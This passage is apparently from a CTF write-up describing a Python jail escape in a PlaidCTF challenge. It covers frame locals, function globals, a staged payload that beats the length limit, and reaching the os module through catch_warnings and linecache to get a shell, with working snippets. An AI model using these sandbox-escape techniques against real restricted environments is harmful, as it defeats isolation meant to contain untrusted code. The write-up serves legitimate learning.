<p>Local variables are those defined inside the scope of a function. In a way
similar to global variables, locals are stored in a dictionary that can be
accessed through the <code class="highlighter-rouge">f_locals</code> attribute of the frame in which the
function is/was running. In the CPython implementation modifying the <code class="highlighter-rouge">f_locals</code>
won’t affect the actual locals.</p>
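<p>Reading another function’s locals through its frame can be sketched as follows. <code class="highlighter-rouge">sys._getframe</code> is specific to CPython, and the two function names are hypothetical:</p>

```python
import sys

def peek_caller_locals():
    # Depth 1 means "the frame of whoever called this function".
    return dict(sys._getframe(1).f_locals)

def work():
    secret = 42
    return peek_caller_locals()

snapshot = work()
print(snapshot)
```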
<h2 id="from-the-outside">from the outside</h2>
<p>If we take a look at the code of <code class="highlighter-rouge">math.cos</code> we might expect it to use <code class="highlighter-rouge">math.pi</code>,
but it will probably be simply referenced as <code class="highlighter-rouge">pi</code>. When we call <code class="highlighter-rouge">math.cos</code> from
somewhere outside of math, <code class="highlighter-rouge">pi</code> won’t be in the globals of the calling
module. It’s interesting to learn how <code class="highlighter-rouge">cos</code> finds the reference to <code class="highlighter-rouge">pi</code>. During
the definition of the function, a reference to the current globals (those of
the module in which it is defined) is kept in the function’s <code class="highlighter-rouge">func_globals</code>
attribute.</p>
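<p>The same mechanism can be observed with a hand-made module. This sketch assumes Python 3, where the attribute is spelled <code class="highlighter-rouge">__globals__</code>; the module <code class="highlighter-rouge">demo</code> and its function <code class="highlighter-rouge">area</code> are stand-ins for <code class="highlighter-rouge">math</code> and <code class="highlighter-rouge">cos</code>:</p>

```python
import types

# Assumption: "demo" stands in for a real module such as math.
demo = types.ModuleType("demo")
exec("pi = 3.14\ndef area(r):\n    return pi * r * r\n", demo.__dict__)

area = demo.area                 # pulled out of its module
result = area(2)                 # still finds pi through its own globals
keeps_home = area.__globals__ is demo.__dict__

print(result, keeps_home)
```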
<h1 id="exploiting">Exploiting</h1>
<p>We are now able to run code quite easily and the character problems are mostly
solved. (We still can’t use some characters but we shall do without them.)
However, some limits still remain. No builtins, no access to modules, and a
character limit. Let’s solve that last problem first, that way it won’t bother
us afterwards.</p>
<h2 id="solving-the-length-limit">Solving the length limit</h2>
<p>To achieve this we shall add a third execution stage. The second stage (the
original exec statement), which can be triggered as many times as we want,
will be tasked with building the final payload. For this it will need to store
the query parts somewhere, and concatenate the new parts as they arrive.</p>
<p>We need a place to store stuff that we can come back to in the next exec. Finding
such a place is easy.</p>
<p>If you have ever done any kind of python jail-escaping the following should be
familiar to you.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">()</span><span class="o">.</span><span class="n">__class__</span><span class="o">.</span><span class="n">__base__</span><span class="o">.</span><span class="n">__subclasses__</span><span class="p">()</span>
</code></pre></div></div>
<p>This gets the <code class="highlighter-rouge">tuple</code>’s type’s (<code class="highlighter-rouge">().__class__</code>) parent (<code class="highlighter-rouge">__base__</code>) which is
<code class="highlighter-rouge">object</code>, then lists all its subclasses that python knows of. Somewhere in those
we should be able to find one which we are allowed to call <code class="highlighter-rouge">setattr</code> on. Indeed
we are lucky and find:</p>
<pre><code class="language-pycon">>>> ().__class__.__base__.__subclasses__()[-2]
<class 'codecs.IncrementalDecoder'>
>>> ().__class__.__base__.__subclasses__()[-2].test = "wapiflapi"
>>> print ().__class__.__base__.__subclasses__()[-2].test
wapiflapi
</code></pre>
<p><strong>All the code should work on python 2.6.6, but it is trivial to adapt to other versions.</strong></p>
<p>Neat, we can store stuff in this and come back to it later. That’s all we need
for our second stage, we are ready to receive the parts from eval, concatenate
them into our storage and finally exec the whole payload when we are done.</p>
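<p>The storage idea can be sketched on Python 3 as follows. This is not the author’s stage-two code: <code class="highlighter-rouge">_DemoStash</code> is a hypothetical class playing the role of <code class="highlighter-rouge">codecs.IncrementalDecoder</code>, and <code class="highlighter-rouge">run_isolated</code> imitates an exec in a fresh scope without builtins:</p>

```python
# Assumption: _DemoStash plays the role of codecs.IncrementalDecoder,
# i.e. any subclass of object that accepts new attributes.
class _DemoStash(object):
    pass

# Expression that finds the class again from inside an empty scope.
FIND = ("[c for c in ().__class__.__base__.__subclasses__()"
        " if c.__name__ == '_DemoStash'][0]")

def run_isolated(code):
    # A fresh scope without builtins for every call, like the jail's exec.
    exec(code, {"__builtins__": {}})

# Each call starts from nothing, yet the buffer survives between calls.
run_isolated(FIND + ".buf = ''")
for part in ["result", " = 6", " * 7"]:
    run_isolated("s = %s; s.buf = s.buf + %r" % (FIND, part))

# Final stage: fetch the assembled payload and execute it.
payload = eval(FIND + ".buf", {"__builtins__": {}})
scope = {}
exec(payload, scope)
print(payload, scope["result"])
```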
<h4 id="battle-plan">Battle plan:</h4>
<ul>
<li>Stage 1, original <code class="highlighter-rouge">eval()</code>
<ul>
<li>Decode input and generate the python code</li>
<li><strong>This bypasses the character limit</strong></li>
</ul>
</li>
<li>Stage 2, original <code class="highlighter-rouge">exec</code>
<ul>
<li>Concatenate stage 1’s output</li>
<li>exec when ready</li>
<li><strong>This bypasses the length limit</strong></li>
</ul>
</li>
<li>Stage 3, <code class="highlighter-rouge">exec</code> by stage 2
<ul>
<li>Actual payload, will hopefully get us a shell</li>
<li><strong>This gets out of jail</strong></li>
</ul>
</li>
</ul>
<p>This basically solves the problem at hand (the length limit), the code is
pretty trivial and will be shown later when putting everything together. Let’s
first find-out how to really escape from jail.</p>
<h2 id="getting-out">Getting out</h2>
<p>We want a shell, we want <code class="highlighter-rouge">system</code>, <code class="highlighter-rouge">execv</code>, <code class="highlighter-rouge">fork</code>, <code class="highlighter-rouge">dup</code>, in short we want the
<code class="highlighter-rouge">os</code> module. Where can we find it? We need to look for a module or function that
has a reference on <code class="highlighter-rouge">os</code> or on something that has a reference on something like
that. Here experience plays a big role, and we know from experience that the
warnings module is loaded by default and has a lot of <em>nice</em> references. If we
can get its globals we should be fine.</p>
<p>What we normally try, and what worked for the NDH Prequals, is:</p>
<pre><code class="language-pycon">>>> [x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0]()._module
<module 'warnings' from '/usr/lib/python2.7/warnings.pyc'>
</code></pre>
<p>This gives us the module straightaway, no questions asked. It’s so easy because
<code class="highlighter-rouge">catch_warnings</code> keeps a reference to its module. But it didn’t work this time
because <code class="highlighter-rouge">catch_warnings</code> uses <code class="highlighter-rouge">sys.modules</code> to get that reference, and thus it
fails. (They are <code class="highlighter-rouge">.clear()</code>ed, remember?)</p>
<pre><code class="language-pytb">Traceback (most recent call last):
File "/Python-2.6.6/Lib/warnings.py", line 333, in __init__
self._module = sys.modules['warnings'] if module is None else module
KeyError: 'warnings'
</code></pre>
<p>But we still have a way of getting that reference: we saw that functions keep
a reference to the globals of the modules in which they were defined. We only
have to find a real function in <code class="highlighter-rouge">catch_warnings</code> and we should be good to go.</p>
<p>After some searching we find out <code class="highlighter-rouge">catch_warnings.__repr__</code> is backed by a real
function. <code class="highlighter-rouge">__repr__</code> itself is an ‘instancemethod’ not a function, but it’s
trivial to get the function using <code class="highlighter-rouge">__repr__.im_func</code>.</p>
<p>Then it’s only a matter of getting the globals of <code class="highlighter-rouge">warnings</code> using <code class="highlighter-rouge">func_globals</code>, which
is a reference to them.</p>
<pre><code class="language-pycon">>>> g_warnings = [x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0].__repr__.im_func.func_globals
>>> print g_warnings["linecache"].os
<module 'os' from '/Python-2.6.6/Lib/os.pyc'>
</code></pre>
<p><code class="highlighter-rouge">warnings</code> imports <code class="highlighter-rouge">linecache</code> which in turn imports <code class="highlighter-rouge">os</code>. We don’t import
anything and that is why doing things like this doesn’t disturb the broken
mess caused by <code class="highlighter-rouge">sys.modules.clear()</code>.</p>
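<p>The same idea can be tried on Python 3 with a more generic search. This sketch is an adaptation, not the payload used during the CTF: it uses <code class="highlighter-rouge">__globals__</code> instead of <code class="highlighter-rouge">func_globals</code>, needs no <code class="highlighter-rouge">im_func</code> because functions stored on a class are already plain functions, and looks at every known class instead of only <code class="highlighter-rouge">catch_warnings</code>, since module internals differ between versions. The function name is hypothetical:</p>

```python
import os    # only to make sure the module is loaded for this demo
import sys   # only used to verify the result at the end

def find_in_function_globals(name):
    """Search every known class for a function whose globals hold a module `name`."""
    for cls in ().__class__.__base__.__subclasses__():
        for attr in list(vars(cls).values()):
            try:
                namespace = attr.__globals__
            except Exception:
                continue  # not a plain Python function
            if not isinstance(namespace, dict):
                continue
            candidate = namespace.get(name)
            if getattr(candidate, "__name__", None) == name:
                return candidate
    return None

# No import is needed by the search itself: sys is reached by reference,
# and os is then taken from the table of loaded modules.
found_sys = find_in_function_globals("sys")
found_os = found_sys.modules["os"]
print(found_sys is sys, found_os is os)
```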
<h1 id="reunion">Reunion</h1>
<p>Now we know everything. We know how to escape the jail, we know how to have
enough space to do so and we know how to use the characters we want to craft our
code. The only thing missing is putting all this together. And it’s pretty easy.</p>
<p>I’d like to thank PPP for their CTF, I really enjoyed it. Also thank you to all
the people who helped me learn python and some of its <em>secrets</em>.</p>wapiflapiPython jails are pretty common among CTF challenges. Often a good knowledge of the interpreter’s internals gets you a long way. For the non initiated it might sometimes seem like black magic. PlaidCTF offered a challenging task that required the combination of some different techniques and logic.